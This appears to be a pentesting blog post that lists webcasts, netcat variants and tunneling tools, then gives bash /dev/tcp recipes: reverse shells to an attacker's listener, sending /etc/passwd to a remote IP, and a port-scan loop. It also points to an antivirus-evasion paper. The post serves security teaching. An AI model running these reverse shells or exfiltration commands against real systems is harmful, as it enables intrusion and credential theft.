I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit: http://pauldotcom.com/wiki/
Ed Skoudis -Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/
Cryptcat: http://cryptcat.sourceforge.
DNScat: http://tadek.pietraszek.org/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies
Stunnel - http://www.stunnel.org/ -
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
Proxytunnel - http://proxytunnel.
Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.
ProxyChains - http://proxychains.
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.
GnuCitizen User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0 # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
No comments:
Post a Comment